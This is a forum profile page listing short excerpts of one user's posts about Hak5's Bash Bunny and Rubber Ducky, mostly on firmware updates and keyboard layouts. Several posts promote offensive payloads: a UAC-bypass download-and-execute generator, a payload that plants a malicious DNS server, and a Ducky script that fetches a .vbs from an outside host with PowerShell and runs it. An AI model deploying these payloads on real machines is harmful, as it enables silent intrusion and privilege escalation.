Jump to content


Active Members
  • Content Count

  • Joined

  • Last visited

  • Days Won


About Skiddie

  • Rank
    Hak5 Fan

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. Does the squirrel have issues getting the update files over USB 3.0 ? Seems not to trigger the update, USB stick is working, formatted correctly and the .bin name is correct Suggestions?
  2. root@bunny:/tools# that is the correct tools folder for running the impacket installer The other tools folder is only via USB storage, not the terminal
  3. The keyboard mapping files are not mine and not made by me. they are sourced from ducktoolkit.com. I have no idea how to do the key mapping my self, however they seems to be some comments/intructions in the .json files themself. Take a look! :)
  4. UPGRADE TO THE LATEST FIRMWARE Download the latest version of the Bash Bunny firmware from https://bashbunny.com/downloads Verify that the SHA256 checksum of the downloaded firmware files matches the checksum listed at bashbunny.com Slide the Bash Bunny switch into Arming Mode (closest to the USB plug) and plug the Bash Bunny into your computer Copy the firmware upgrade file downloaded in step 1 to the root of the Bash Bunny flash drive. Safely eject the Bash Bunny flash drive (IMPORTANT) With the switch still in Arming Mode, plug the Bash Bunny back into yo
  5. I have yet managed to install the https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/general/DuckyInstall "tools" repo that includes the support for many keyboard languages using the traditional method that worked before firmware 1.1xx. It only gives me a weird combination of flashing lights, no logs or tools. So if u wanna install those manually, this is how. Download and "zip"/"rar" into https://github.com/hak5/bashbunny-payloads/blob/master/payloads/library/general/DuckyInstall/DuckToolkit-1.0.1.tar.gz Go to Ducktoolkit -> Languages copy all the
  6. Definitely one of the best ones yet, great job!
  7. This looks interesting, will check out!
  8. I saw the bottom comment now, i did do a earlier search tho.
  9. Just received the brand new bunny, however. From what i can see it does not come with any other keyboard support then US (us.json). Any ATM for full keyboard support like the rubber ducky has? Any simple way of porting the language files from rubber ducky to this? I did take a look at the HID map to try to map my own xxx.json, i failed when it came to multiple key combination resulting in one output key. Any specific method to make this process ALLOT easier?
  10. This is a payload mainly based of the UAC bypassing download and execute payload generator i released not so long ago I strongly suggest you check that out first. https://www.youtube.com/watch?v=fmRRX7-G4lc https://github.com/SkiddieTech/UAC-D-E-Rubber-Ducky So the goal of this payload is to add a new primary "malicious" DNS server for all active networks devices on any windows computer, to do this we use the UAC bypass method used in the above payload , but in a different payload (also in the same "Visual basic " script format) The "gain" from this would be to
  11. This is great, when i made the original payload generator it was the first time ever i coded anything in python. I had no idea that the 2.0 platform i based it on was so old and that 3.0 ( released in 2008 ) is the "new" future standard. Thanks for giving proper credits and thanks for porting this into python 3.0! Good solid work here! At this point i'm happy that i keep with the choose of holding the payload sources in an update-able raw pastebin online, so your generator (as well as mine) always stay up to date!:)
  12. This is my official release of my UAC bypassing Rubber Ducky payload generator "UAC-DUCK". Download and execute any binary executable on any windows machine with UAC enabled as administrator WITHOUT prompting the user to elevate privileges . Its a 3 second download and execute with admin access. Generator written in Python so it's cross compatible with Windows and Linux. Github: https://github.com/SkiddieTech/UAC-D-E-Rubber-Ducky Full demo: http://sendvid.com/uh6i317i It uses a simple 2 stage process Stage 1: Stage one is the script that is triggered w
  13. Update: Currently working on a python generator "UAC Duck" Early screenshot Yes "Woud" i'm lazy mmkay. need sleep <3 Release next week! :)
  14. Update! I noticed that i re-declared two new strings that are never used. Updated .vbs script -> http://pastebin.com/31bu24q9 (Untested, let me know, should be fine)
  15. Hello! This is my first post and contribute to this community, one of hopefully many. I am yet to receive my rubber ducky, so while waiting i thought i give writing some scripts a go. I consider the rubber ducky to be the mother of physical access exploits, being able to deploy anything in a very short period of time. DELAY 750 GUI r DELAY 1000 STRING powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://myhost.com/script.txt', '%temp%/run.vbs') ;Start-Process '%temp%/run.vbs'}" DELAY 500 ENTER Above is a basic rubber ducky script that downloads
  • Create New...